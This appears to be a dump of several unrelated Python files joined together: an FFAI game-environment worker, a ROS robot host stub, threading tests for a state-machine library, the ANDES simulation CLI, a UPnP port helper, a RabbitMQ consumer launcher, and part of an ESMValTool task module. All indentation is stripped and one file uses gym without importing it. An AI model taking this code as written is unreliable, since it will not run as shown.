import numpy as np
import ffai
from multiprocessing import Process, Pipe
import ffai
def worker(remote, parent_remote, env):
parent_remote.close()
# Get observations space (layer, height, width)
obs_space = env.observation_space
# Get action space
act_space = env.action_space
# Create random state for action selection
seed = env.get_seed()
rnd = np.random.RandomState(seed)
# Play 10 games
steps = 0
# Reset environment
obs = env.reset()
while True:
command = remote.recv()
if command == 'step':
# Sample random action type
action_types = env.available_action_types()
action_type = rnd.choice(action_types)
# Sample random position - if any
available_positions = env.available_positions(action_type)
pos = rnd.choice(available_positions) if len(available_positions) > 0 else None
# Create action object
action = {
'action-type': action_type,
'x': pos.x if pos is not None else None,
'y': pos.y if pos is not None else None
}
# Gym step function
obs, reward, done, info = env.step(action)
steps += 1
# Render - Does not work when running multiple processes
# env.render(feature_layers=False)
if done:
obs = env.reset()
remote.send((obs, reward, done, info))
elif command == 'reset':
# Reset environment
obs = env.reset()
done = False
elif command == 'close':
# Close environment
env.close()
break
if __name__ == "__main__":
renderer = ffai.Renderer()
nenvs = 8
envs = [gym.make("FFAI-1-v3") for _ in range(nenvs)]
for i in range(len(envs)):
envs[i].seed()
remotes, work_remotes = zip(*[Pipe() for _ in range(nenvs)])
ps = [Process(target=worker, args=(work_remote, remote, env))
for (work_remote, remote, env) in zip(work_remotes, remotes, envs)]
for p in ps:
p.daemon = True # If the main process crashes, we should not cause things to hang
p.start()
for remote in work_remotes:
remote.close()
for i in range(1000):
print(i)
for remote in remotes:
remote.send('step')
results = [remote.recv() for remote in remotes]
for j in range(len(results)):
obs, reward, done, info = results[j]
renderer.render(obs, j)
for remote in remotes:
remote.send('close')
for p in ps:
p.join()
|
dummy_host.py
|
#!/usr/bin/python3
import threading
import time
import rospy
import rosnode
import copy
import threading
from nics_robot_host.srv import *
class pos_data(object):
def __init__(self,x,y,theta):
self.x = x
self.y = y
self.theta = theta
class DummyHost(object):
def __init__(self, args, env=None):
# get agent number from env
self.agent_num = 1
# init host node
rospy.init_node("robot_host")
# TODO get this param from launch file
self.core_fps = 10
# check the number of agent client
All_ready = False
while not All_ready:
node_name_list:list[str] = rosnode.get_node_names()
self.car_id_list = []
for node_name in node_name_list:
if node_name.endswith('robot_client'):
# assume all robot_client note named as '/XXXX/car_id/robot_client'
self.car_id_list.append(node_name.split('/')[-2])
if len(self.car_id_list) == self.agent_num:
All_ready = True
break
print(self.car_id_list)
time.sleep(0.5)
#build observation services
self.obs_server_list = []
for car_id in self.car_id_list:
handle = lambda req: self.obs_calculate(car_id,req)
obs_messenger = rospy.Service('/'+car_id+'/get_obs', obs, handle)
self.env = None
self.vrpn_list = [pos_data(0,0,0) for _ in range(self.agent_num)]
self.core_thread = threading.Thread(target=self.core_function)
rospy.spin()
def obs_calculate(self,car_id,req):
obs_result = [0.0,0.0,1.0,0.0,0.0,0.5]
rospy.loginfo("Calculate obs for car %s",car_id)
print(obs_result)
return obsResponse(obs_result)
def core_function(self):
c = 0
while True:
if c == 0:
rospy.loginfo("dummy host alive")
c = (c + 1)%100
time.sleep(self.core_fps)
|
test_threading.py
|
try:
from builtins import object
except ImportError:
pass
import time
from threading import Thread
import logging
from transitions.extensions import MachineFactory
from .test_nesting import TestNestedTransitions as TestsNested
from .test_core import TestTransitions as TestCore
from .utils import Stuff, DummyModel, SomeContext
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def heavy_processing():
time.sleep(1)
def heavy_checking():
time.sleep(0.5)
return False
class TestLockedTransitions(TestCore):
def setUp(self):
self.machine_cls = MachineFactory.get_predefined(locked=True)
self.stuff = Stuff(machine_cls=self.machine_cls)
self.stuff.heavy_processing = heavy_processing
self.stuff.machine.add_transition('forward', 'A', 'B', before='heavy_processing')
def tearDown(self):
pass
def test_thread_access(self):
thread = Thread(target=self.stuff.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
self.assertTrue(self.stuff.is_B())
def test_parallel_access(self):
thread = Thread(target=self.stuff.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
self.stuff.to_C()
# if 'forward' has not been locked, it is still running
# we have to wait to be sure it is done
time.sleep(1)
self.assertEqual(self.stuff.state, "C")
def test_parallel_deep(self):
self.stuff.machine.add_transition('deep', source='*', dest='C', after='to_D')
thread = Thread(target=self.stuff.deep)
thread.start()
time.sleep(0.01)
self.stuff.to_C()
time.sleep(1)
self.assertEqual(self.stuff.state, "C")
def test_conditional_access(self):
self.stuff.heavy_checking = heavy_checking # checking takes 1s and returns False
self.stuff.machine.add_transition('advance', 'A', 'B', conditions='heavy_checking')
self.stuff.machine.add_transition('advance', 'A', 'D')
t = Thread(target=self.stuff.advance)
t.start()
time.sleep(0.1)
logger.info('Check if state transition done...')
# Thread will release lock before Transition is finished
res = self.stuff.is_D()
self.assertTrue(res)
def test_pickle(self):
import sys
if sys.version_info < (3, 4):
import dill as pickle
else:
import pickle
# go to non initial state B
self.stuff.to_B()
# pickle Stuff model
dump = pickle.dumps(self.stuff)
self.assertIsNotNone(dump)
stuff2 = pickle.loads(dump)
self.assertTrue(stuff2.is_B())
# check if machines of stuff and stuff2 are truly separated
stuff2.to_A()
self.stuff.to_C()
self.assertTrue(stuff2.is_A())
thread = Thread(target=stuff2.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
# both objects should be in different states
# and also not share locks
begin = time.time()
# stuff should not be locked and execute fast
self.assertTrue(self.stuff.is_C())
fast = time.time()
# stuff2 should be locked and take about 1 second
# to be executed
self.assertTrue(stuff2.is_B())
blocked = time.time()
self.assertAlmostEqual(fast - begin, 0, delta=0.1)
self.assertAlmostEqual(blocked - begin, 1, delta=0.1)
def test_context_managers(self):
class CounterContext(object):
def __init__(self):
self.counter = 0
self.level = 0
self.max = 0
super(CounterContext, self).__init__()
def __enter__(self):
self.counter += 1
self.level += 1
self.max = max(self.level, self.max)
def __exit__(self, *exc):
self.level -= 1
M = MachineFactory.get_predefined(locked=True)
c = CounterContext()
m = M(states=['A', 'B', 'C', 'D'], transitions=[['reset', '*', 'A']], initial='A', machine_context=c)
m.get_triggers('A')
self.assertEqual(c.max, 1) # was 3 before
self.assertEqual(c.counter, 4) # was 72 (!) before
# This test has been used to quantify the changes made in locking in version 0.5.0.
# See https://github.com/tyarkoni/transitions/issues/167 for the results.
# def test_performance(self):
# import timeit
# states = ['A', 'B', 'C']
# transitions = [['go', 'A', 'B'], ['go', 'B', 'C'], ['go', 'C', 'A']]
#
# M1 = MachineFactory.get_predefined()
# M2 = MachineFactory.get_predefined(locked=True)
#
# def test_m1():
# m1 = M1(states=states, transitions=transitions, initial='A')
# m1.get_triggers('A')
#
# def test_m2():
# m2 = M2(states=states, transitions=transitions, initial='A')
# m2.get_triggers('A')
#
# t1 = timeit.timeit(test_m1, number=20000)
# t2 = timeit.timeit(test_m2, number=20000)
# self.assertAlmostEqual(t2/t1, 1, delta=0.5)
class TestMultipleContexts(TestCore):
def setUp(self):
self.event_list = []
self.s1 = DummyModel()
self.c1 = SomeContext(event_list=self.event_list)
self.c2 = SomeContext(event_list=self.event_list)
self.c3 = SomeContext(event_list=self.event_list)
self.c4 = SomeContext(event_list=self.event_list)
self.machine_cls = MachineFactory.get_predefined(locked=True)
self.stuff = Stuff(machine_cls=self.machine_cls, extra_kwargs={
'machine_context': [self.c1, self.c2]
})
self.stuff.machine.add_model(self.s1, model_context=[self.c3, self.c4])
del self.event_list[:]
self.stuff.machine.add_transition('forward', 'A', 'B')
def tearDown(self):
self.stuff.machine.remove_model(self.s1)
def test_ordering(self):
self.stuff.forward()
# There are a lot of internal enter/exits, but the key is that the outermost are in the expected order
self.assertEqual((self.c1, "enter"), self.event_list[0])
self.assertEqual((self.c2, "enter"), self.event_list[1])
self.assertEqual((self.c2, "exit"), self.event_list[-2])
self.assertEqual((self.c1, "exit"), self.event_list[-1])
def test_model_context(self):
self.s1.forward()
self.assertEqual((self.c1, "enter"), self.event_list[0])
self.assertEqual((self.c2, "enter"), self.event_list[1])
# Since there are a lot of internal enter/exits, we don't actually know how deep in the stack
# to look for these. Should be able to correct when https://github.com/tyarkoni/transitions/issues/167
self.assertIn((self.c3, "enter"), self.event_list)
self.assertIn((self.c4, "enter"), self.event_list)
self.assertIn((self.c4, "exit"), self.event_list)
self.assertIn((self.c3, "exit"), self.event_list)
self.assertEqual((self.c2, "exit"), self.event_list[-2])
self.assertEqual((self.c1, "exit"), self.event_list[-1])
# Same as TestLockedTransition but with LockedHierarchicalMachine
class TestLockedHierarchicalTransitions(TestsNested, TestLockedTransitions):
def setUp(self):
states = ['A', 'B', {'name': 'C', 'children': ['1', '2', {'name': '3', 'children': ['a', 'b', 'c']}]},
'D', 'E', 'F']
self.machine_cls = MachineFactory.get_predefined(locked=True, nested=True)
self.state_cls = self.machine_cls.state_cls
self.state_cls.separator = '_'
self.stuff = Stuff(states, machine_cls=self.machine_cls)
self.stuff.heavy_processing = heavy_processing
self.stuff.machine.add_transition('forward', '*', 'B', before='heavy_processing')
def test_parallel_access(self):
thread = Thread(target=self.stuff.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
self.stuff.to_C()
# if 'forward' has not been locked, it is still running
# we have to wait to be sure it is done
time.sleep(1)
self.assertEqual(self.stuff.state, "C")
def test_callbacks(self):
class MachineModel(self.stuff.machine_cls):
def __init__(self):
self.mock = MagicMock()
super(MachineModel, self).__init__(self, states=['A', 'B', 'C'])
def on_enter_A(self):
self.mock()
model = MachineModel()
model.to_A()
self.assertTrue(model.mock.called)
def test_pickle(self):
import sys
if sys.version_info < (3, 4):
import dill as pickle
else:
import pickle
states = ['A', 'B', {'name': 'C', 'children': ['1', '2', {'name': '3', 'children': ['a', 'b', 'c']}]},
'D', 'E', 'F']
transitions = [
{'trigger': 'walk', 'source': 'A', 'dest': 'B'},
{'trigger': 'run', 'source': 'B', 'dest': 'C'},
{'trigger': 'sprint', 'source': 'C', 'dest': 'D'}
]
m = self.stuff.machine_cls(states=states, transitions=transitions, initial='A')
m.heavy_processing = heavy_processing
m.add_transition('forward', 'A', 'B', before='heavy_processing')
# # go to non initial state B
m.to_B()
# pickle Stuff model
dump = pickle.dumps(m)
self.assertIsNotNone(dump)
m2 = pickle.loads(dump)
self.assertTrue(m2.is_B())
m2.to_C_3_a()
m2.to_C_3_b()
# check if machines of stuff and stuff2 are truly separated
m2.to_A()
m.to_C()
self.assertTrue(m2.is_A())
thread = Thread(target=m2.forward)
thread.start()
# give thread some time to start
time.sleep(0.01)
# both objects should be in different states
# and also not share locks
begin = time.time()
# stuff should not be locked and execute fast
self.assertTrue(m.is_C())
fast = time.time()
# stuff2 should be locked and take about 1 second
# to be executed
self.assertTrue(m2.is_B())
blocked = time.time()
self.assertAlmostEqual(fast - begin, 0, delta=0.1)
self.assertAlmostEqual(blocked - begin, 1, delta=0.1)
|
main.py
|
#!/bin/bash python
# [ANDES] (C)2015-2020 Hantao Cui
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# File name: main.py
# Last modified: 8/16/20, 7:26 PM
import glob
import logging
import os
import io
import sys
import platform
import pprint
import cProfile
import pstats
from time import sleep
from subprocess import call
from typing import Optional, Union
from functools import partial
import andes
from andes.system import System
from andes.routines import routine_cli
from andes.utils.misc import elapsed, is_interactive
from andes.utils.paths import get_config_path, tests_root, get_log_dir
from andes.shared import coloredlogs, unittest
from andes.shared import Pool, Process
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def config_logger(stream=True,
file=True,
stream_level=logging.INFO,
log_file='andes.log',
log_path=None,
file_level=logging.DEBUG,
):
"""
Configure a logger for the andes package with options for a `FileHandler`
and a `StreamHandler`. This function is called at the beginning of
``andes.main.main()``.
Parameters
----------
stream : bool, optional
Create a `StreamHandler` for `stdout` if ``True``.
If ``False``, the handler will not be created.
file : bool, optionsl
True if logging to ``log_file``.
log_file : str, optional
Logg file name for `FileHandler`, ``'andes.log'`` by default.
If ``None``, the `FileHandler` will not be created.
log_path : str, optional
Path to store the log file. By default, the path is generated by
get_log_dir() in utils.misc.
stream_level : {10, 20, 30, 40, 50}, optional
`StreamHandler` verbosity level.
file_level : {10, 20, 30, 40, 50}, optional
`FileHandler` verbosity level.
Returns
-------
None
"""
lg = logging.getLogger('andes')
lg.setLevel(logging.DEBUG)
if log_path is None:
log_path = get_log_dir()
sh_formatter_str = '%(message)s'
if stream_level == 1:
sh_formatter_str = '%(name)s:%(lineno)d - %(levelname)s - %(message)s'
stream_level = 10
sh_formatter = logging.Formatter(sh_formatter_str)
if len(lg.handlers) == 0:
if stream is True:
sh = logging.StreamHandler()
sh.setFormatter(sh_formatter)
sh.setLevel(stream_level)
lg.addHandler(sh)
# file handler for level DEBUG and up
if file is True and (log_file is not None):
log_full_path = os.path.join(log_path, log_file)
fh_formatter = logging.Formatter('%(process)d: %(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh = logging.FileHandler(log_full_path)
fh.setLevel(file_level)
fh.setFormatter(fh_formatter)
lg.addHandler(fh)
globals()['logger'] = lg
if not is_interactive():
coloredlogs.install(logger=lg, level=stream_level, fmt=sh_formatter_str)
def edit_conf(edit_config: Optional[Union[str, bool]] = ''):
"""
Edit the Andes config file which occurs first in the search path.
Parameters
----------
edit_config : bool
If ``True``, try to open up an editor and edit the config file. Otherwise returns.
Returns
-------
bool
``True`` is a config file is found and an editor is opened. ``False`` if ``edit_config`` is False.
"""
ret = False
# no `edit-config` supplied
if edit_config == '':
return ret
conf_path = get_config_path()
if conf_path is None:
logger.info('Config file does not exist. Automatically saving.')
system = System()
conf_path = system.save_config()
logger.info('Editing config file "%s"', conf_path)
editor = ''
if edit_config is not None:
# use `edit_config` as default editor
editor = edit_config
else:
# use the following default editors
if platform.system() == 'Linux':
editor = os.environ.get('EDITOR', 'vim')
elif platform.system() == 'Darwin':
editor = os.environ.get('EDITOR', 'vim')
elif platform.system() == 'Windows':
editor = 'notepad.exe'
editor_cmd = editor.split()
editor_cmd.append(conf_path)
call(editor_cmd)
ret = True
return ret
def save_conf(config_path=None, overwrite=None):
"""
Save the Andes config to a file at the path specified by ``save_config``.
The save action will not run if ``save_config = ''``.
Parameters
----------
config_path : None or str, optional, ('' by default)
Path to the file to save the config file. If the path is an emtpy
string, the save action will not run. Save to
`~/.andes/andes.conf` if ``None``.
Returns
-------
bool
``True`` is the save action is run. ``False`` otherwise.
"""
ret = False
# no ``--save-config ``
if config_path == '':
return ret
if config_path is not None and os.path.isdir(config_path):
config_path = os.path.join(config_path, 'andes.rc')
ps = System()
ps.save_config(config_path, overwrite=overwrite)
ret = True
return ret
def remove_output(recursive=False):
"""
Remove the outputs generated by Andes, including power flow reports
``_out.txt``, time-domain list ``_out.lst`` and data ``_out.dat``,
eigenvalue analysis report ``_eig.txt``.
Parameters
----------
recursive : bool
Recursively clean all subfolders
Returns
-------
bool
``True`` is the function body executes with success. ``False``
otherwise.
"""
found = False
cwd = os.getcwd()
if recursive:
dirs = [x[0] for x in os.walk(cwd)]
else:
dirs = (cwd,)
for d in dirs:
for file in os.listdir(d):
if file.endswith('_eig.txt') or \
file.endswith('_out.txt') or \
file.endswith('_out.lst') or \
file.endswith('_out.npy') or \
file.endswith('_out.npz') or \
file.endswith('_out.csv') or \
file.endswith('_prof.prof') or \
file.endswith('_prof.txt'):
found = True
try:
os.remove(os.path.join(d, file))
logger.info('"%s" removed.', os.path.join(d, file))
except IOError:
logger.error('Error removing file "%s".',
os.path.join(d, file))
if not found:
logger.info('No output file found in the working directory.')
return True
def print_license():
"""
Print out Andes license to stdout.
"""
print(f"""
ANDES version {andes.__version__}
Copyright (c) 2015-2020 Hantao Cui
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
A copy of the GNU General Public License is included below.
For further information, see <http://www.gnu.org/licenses/>.
""")
return True
def load(case, codegen=False, setup=True, **kwargs):
"""
Load a case and set up a system without running routine.
Return a system.
Takes other kwargs recognizable by ``System``,
such as ``addfile``, ``input_path``, and ``no_putput``.
Parameters
----------
case: str
Path to the test case
codegen : bool, optional
Call full `System.prepare` on the returned system.
Set to True if one need to inspect pretty-print
equations and run simulations.
setup : bool, optional
Call `System.setup` after loading
Warnings
-------
If one need to add devices in addition to these from the case
file, do ``setup=False`` and call ``System.add()`` to add devices.
When done, manually invoke ``setup()`` to set up the system.
"""
system = System(case=case, **kwargs)
if codegen:
system.prepare()
else:
system.undill()
if not andes.io.parse(system):
return None
if setup:
system.setup()
return system
def run_case(case, *, routine='pflow', profile=False,
convert='', convert_all='', add_book=None,
codegen=False, remove_pycapsule=False, **kwargs):
"""
Run a single simulation case.
"""
pr = cProfile.Profile()
# enable profiler if requested
if profile is True:
pr.enable()
system = load(case, codegen=codegen, **kwargs)
if system is None:
return None
skip_empty = True
overwrite = None
# convert to xlsx and process `add-book` option
if add_book is not None:
convert = 'xlsx'
overwrite = True
if convert_all != '':
convert = 'xlsx'
skip_empty = False
# convert to the requested format
if convert != '':
andes.io.dump(system, convert, overwrite=overwrite, skip_empty=skip_empty,
add_book=add_book)
return system
if routine is not None:
if isinstance(routine, str):
routine = [routine]
if 'pflow' in routine:
routine = list(routine)
routine.remove('pflow')
if system.is_setup:
system.PFlow.run(**kwargs)
for r in routine:
system.__dict__[routine_cli[r.lower()]].run(**kwargs)
else:
logger.error("System is not set up. Routines cannot continue.")
# Disable profiler and output results
if profile:
pr.disable()
if system.files.no_output:
nlines = 40
s = io.StringIO()
ps = pstats.Stats(pr, stream=sys.stdout).sort_stats('cumtime')
ps.print_stats(nlines)
logger.info(s.getvalue())
s.close()
else:
nlines = 999
with open(system.files.prof, 'w') as s:
ps = pstats.Stats(pr, stream=s).sort_stats('cumtime')
ps.print_stats(nlines)
ps.dump_stats(system.files.prof_raw)
logger.info('cProfile text data written to "%s".', system.files.prof)
logger.info('cProfile raw data written to "%s". View with tool `snakeviz`.', system.files.prof_raw)
if remove_pycapsule is True:
system.remove_pycapsule()
return system
def _find_cases(filename, path):
"""
Find valid cases using the provided names and path
Parameters
----------
filename : str
Test case file name
Returns
-------
list
A list of valid cases.
"""
logger.info('Working directory: "%s"', os.getcwd())
if len(filename) == 0:
logger.info('info: no input file. Use `andes run -h` for help.')
if isinstance(filename, str):
filename = [filename]
cases = []
for file in filename:
full_paths = os.path.join(path, file)
found = glob.glob(full_paths)
if len(found) == 0:
logger.error('error: file "%s" does not exist.', full_paths)
else:
cases += found
# remove folders and make cases unique
unique_cases = list(set(cases))
valid_cases = []
for case in unique_cases:
if os.path.isfile(case):
valid_cases.append(case)
if len(valid_cases) > 0:
valid_cases = sorted(valid_cases)
logger.debug('Found files: %s', pprint.pformat(valid_cases))
return valid_cases
def set_logger_level(lg, type_to_set, level):
"""Set logging level for the given type of handler."""
for ii, h in enumerate(lg.handlers):
if isinstance(h, type_to_set):
h.setLevel(level)
def find_log_path(lg):
"""Find the file paths of the FileHandlers."""
out = []
for h in lg.handlers:
if isinstance(h, logging.FileHandler):
out.append(h.baseFilename)
return out
def _run_multiprocess_proc(cases, ncpu=os.cpu_count(), **kwargs):
"""
Run multiprocessing with `Process`.
Return values from `run_case` are not preserved. Always return `True` when done.
"""
# start processes
jobs = []
for idx, file in enumerate(cases):
job = Process(name=f'Process {idx:d}', target=run_case, args=(file,), kwargs=kwargs)
jobs.append(job)
job.start()
start_msg = f'Process {idx:d} for "{file:s}" started.'
print(start_msg)
logger.debug(start_msg)
if (idx % ncpu == ncpu - 1) or (idx == len(cases) - 1):
sleep(0.1)
for job in jobs:
job.join()
jobs = []
return True
def _run_multiprocess_pool(cases, ncpu=os.cpu_count(), verbose=logging.INFO, **kwargs):
"""
Run multiprocessing jobs using Pool.
This function returns all System instances in a list, but requires longer computation time.
Parameters
----------
ncpu : int, optional = os.cpu_cout()
Number of cpu cores to use in parallel
mp_verbose : 10 - 50
Verbosity level during multiprocessing
verbose : 10, 20, 30, 40, 50
Verbosity level outside multiprocessing
"""
pool = Pool(ncpu)
print("Cases are processed in the following order:")
print('\n'.join([f'"{name}"' for name in cases]))
ret = pool.map(partial(run_case, verbose=verbose, remove_pycapsule=True, **kwargs), cases)
return ret
def run(filename, input_path='', verbose=20, mp_verbose=30, ncpu=os.cpu_count(), pool=False,
cli=False, codegen=False, shell=False, **kwargs):
"""
Entry point to run ANDES routines.
Parameters
----------
filename : str
file name (or pattern)
input_path : str, optional
input search path
verbose : int, 10 (DEBUG), 20 (INFO), 30 (WARNING), 40 (ERROR), 50 (CRITICAL)
Verbosity level
mp_verbose : int
Verbosity level for multiprocessing tasks
ncpu : int, optional
Number of cpu cores to use in parallel
pool: bool, optional
Use Pool for multiprocessing to return a list of created Systems.
kwargs
Other supported keyword arguments
cli : bool, optional
If is running from command-line. If True, returns exit code instead of System
codegen : bool, optional
Run full code generation for System before loading case.
Only used for single test case.
shell : bool, optional
If True, enter IPython shell after routine.
Returns
-------
System or exit_code
An instance of system (if `cli == False`) or an exit code otherwise..
"""
if is_interactive():
config_logger(file=False, stream_level=verbose)
# put `input_path` back to `kwargs`
kwargs['input_path'] = input_path
cases = _find_cases(filename, input_path)
system = None
ex_code = 0
if len(filename) > 0 and len(cases) == 0:
ex_code = 1 # file specified but not found
t0, _ = elapsed()
if len(cases) == 1:
system = run_case(cases[0], codegen=codegen, **kwargs)
elif len(cases) > 1:
# suppress logging output during multiprocessing
logger.info('-> Processing %s jobs on %s CPUs.', len(cases), ncpu)
set_logger_level(logger, logging.StreamHandler, mp_verbose)
set_logger_level(logger, logging.FileHandler, logging.DEBUG)
kwargs['no_pbar'] = True
if pool is True:
system = _run_multiprocess_pool(cases, ncpu=ncpu, verbose=verbose, mp_verbose=mp_verbose, **kwargs)
else:
system = _run_multiprocess_proc(cases, ncpu=ncpu, verbose=verbose, mp_verbose=mp_verbose, **kwargs)
# restore command line output when all jobs are done
set_logger_level(logger, logging.StreamHandler, verbose)
log_files = find_log_path(logger)
if len(log_files) > 0:
log_paths = '\n'.join(log_files)
print(f'Log saved to "{log_paths}".')
t0, s0 = elapsed(t0)
if len(cases) == 1:
if system is not None:
ex_code += system.exit_code
else:
ex_code += 1
elif len(cases) > 1:
if isinstance(system, list):
for s in system:
ex_code += s.exit_code
if len(cases) == 1:
if ex_code == 0:
print(f'-> Single process finished in {s0}.')
else:
print(f'-> Single process exit with an error in {s0}.')
elif len(cases) > 1:
if ex_code == 0:
print(f'-> Multiprocessing finished in {s0}.')
else:
print(f'-> Multiprocessing exit with an error in {s0}.')
# IPython interactive shell
if shell is True:
try:
from IPython import embed
# load plotter before entering IPython
if system is None:
logger.warning("IPython: The System object has not been created.")
elif isinstance(system, System):
logger.info("IPython: Access System object in variable `system`.")
system.TDS.load_plotter()
elif isinstance(system, list):
logger.warning("IPython: System objects stored in list `system`.\n"
"Call `TDS.load_plotter()` on each for plotter.")
embed()
except ImportError:
logger.warning("IPython import error. Installed?")
if cli is True:
return ex_code
return system
def plot(**kwargs):
"""
Wrapper for the plot tool.
"""
from andes.plot import tdsplot
tdsplot(**kwargs)
def misc(edit_config='', save_config='', show_license=False, clean=True, recursive=False,
overwrite=None, **kwargs):
"""
Misc functions.
"""
if edit_conf(edit_config):
return
if show_license:
print_license()
return
if save_config != '':
save_conf(save_config, overwrite=overwrite)
return
if clean is True:
remove_output(recursive)
return
logger.info("info: no option specified. Use 'andes misc -h' for help.")
def prepare(quick=False, incremental=False, cli=False, full=False, **kwargs):
"""
Run code generation.
Warnings
--------
The default behavior has changed since v1.0.8: when `cli` is `True` and
`full` is not `True`, quick code generation will be used.
Returns
-------
System object if `cli` is `False`; exit_code 0 otherwise.
"""
# use `quick` for cli if `full` is not enforced,
# because the LaTeX code gen is usually discarded in CLI.
if cli is True:
if not full:
quick = True
if full is True:
quick = False
system = System()
system.prepare(quick=quick, incremental=incremental)
if cli is True:
return 0
else:
return system
def selftest(quick=False, **kwargs):
"""
Run unit tests.
"""
# map verbosity level from logging to unittest
vmap = {1: 3, 10: 3, 20: 2, 30: 1, 40: 1, 50: 1}
verbose = vmap[kwargs.get('verbose', 20)]
# skip if quick
quick_skips = ('test_1_docs', 'test_codegen_inc')
try:
logger.handlers[0].setLevel(logging.WARNING)
sys.stdout = open(os.devnull, 'w') # suppress print statements
except IndexError: # logger not set up
pass
# discover test cases
test_directory = tests_root()
suite = unittest.TestLoader().discover(test_directory)
# remove codegen for quick mode
if quick is True:
for test_group in suite._tests:
for test_class in test_group._tests:
tests_keep = list()
for t in test_class._tests:
if t._testMethodName not in quick_skips:
tests_keep.append(t)
test_class._tests = tests_keep
unittest.TextTestRunner(verbosity=verbose).run(suite)
sys.stdout = sys.__stdout__
def doc(attribute=None, list_supported=False, init_seq=False, config=False, **kwargs):
"""
Quick documentation from command-line.
"""
system = System()
if attribute is not None:
if attribute in system.__dict__ and hasattr(system.__dict__[attribute], 'doc'):
if init_seq is True:
system.__dict__[attribute].get_init_order()
return
logger.info(system.__dict__[attribute].doc())
else:
logger.error('Model <%s> does not exist.', attribute)
elif list_supported is True:
logger.info(system.supported_models())
else:
logger.info('info: no option specified. Use \'andes doc -h\' for help.')
|
toolkit.py
|
# The MIT License (MIT).
# Copyright (c) 2015, Nicolas Sebrecht & contributors.
import os
from threading import Thread
def runHook(hookFunc, *args):
class Hook(object):
def __init__(self):
self._stop = True
def ended(self):
self._stop = False
def stop(self):
return self._stop
hookName = hookFunc.__name__
# Don't run hooks for action unitTests.
if hookName == 'preHook':
if args[0] == 'unitTests':
return False
hook = Hook()
args = (hook,) + args
thread = Thread(name=hookName, target=hookFunc, args=args, daemon=True)
thread.start()
thread.join(10) # TODO: get timeout from rascal.
return hook.stop()
def xTrans(thing, transforms):
"""Applies set of transformations to a thing.
:args:
- thing: string; if None, then no processing will take place.
- transforms: iterable that returns transformation function
on each turn.
Returns transformed thing."""
if thing == None:
return None
for f in transforms:
thing = f(thing)
return thing
def expandPath(path):
xtrans = [os.path.expanduser, os.path.expandvars, os.path.abspath]
return xTrans(path, xtrans)
def dictValueFromPath(dictionnary, path):
def getItem(tmpDict, lst_path):
if len(lst_path) > 0:
if isinstance(tmpDict, dict):
newDict = tmpDict.get(lst_path.pop(0))
return getItem(newDict, lst_path)
else:
raise KeyError('invalid path')
return tmpDict
lst_path = path.split('.')
return getItem(dictionnary, lst_path)
|
upnp.py
|
import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except Exception as e:
log.info(f"Removal of previous portmapping failed. This does not indicate an error: {e}")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "beet", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run beet, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
main.py
|
#!/usr/bin/python3
import os
from multiprocessing import Process
import json
from app.client import Consumer
from app.engine import Engine
def main():
cpu_count = os.cpu_count()
processes = [Process(target=start_consumers) for x in range(cpu_count)]
for proc in processes:
proc.start()
print("Created {} rabbitmq consumers".format(cpu_count))
print(' [*] Waiting for messages. To exit press CTRL+C or kill process')
#finish when all consumers die
for proc in processes:
proc.join()
print("The all rabbitmq consumers is down")
def start_consumers():
client = Consumer()
client.start_consuming(callback)
#for each consume use this callback
def callback(ch, method, properties, body):
engine = Engine()
engine.initCollaborativeFilteringModel(json.loads(body.decode()))
# def main():
# engine = Engine()
# engine.loadMovieLensDataset()
# engine.collaborativeFilteringModel()
main()
|
_task.py
|
"""ESMValtool task definition."""
import abc
import contextlib
import datetime
import logging
import numbers
import os
import pprint
import subprocess
import sys
import textwrap
import threading
import time
from copy import deepcopy
from multiprocessing import Pool
from multiprocessing.pool import ApplyResult
from pathlib import Path, PosixPath
from shutil import which
from typing import Dict, Type
import psutil
import yaml
from ._citation import _write_citation_files
from ._config import DIAGNOSTICS, TAGS
from ._provenance import TrackedFile, get_task_provenance
def path_representer(dumper, data):
"""For printing pathlib.Path objects in yaml files."""
return dumper.represent_scalar('tag:yaml.org,2002:str', str(data))
yaml.representer.SafeRepresenter.add_representer(Path, path_representer)
yaml.representer.SafeRepresenter.add_representer(PosixPath, path_representer)
logger = logging.getLogger(__name__)
DATASET_KEYS = {
'mip',
}
def _get_resource_usage(process, start_time, children=True):
"""Get resource usage."""
# yield header first
entries = [
'Date and time (UTC)',
'Real time (s)',
'CPU time (s)',
'CPU (%)',
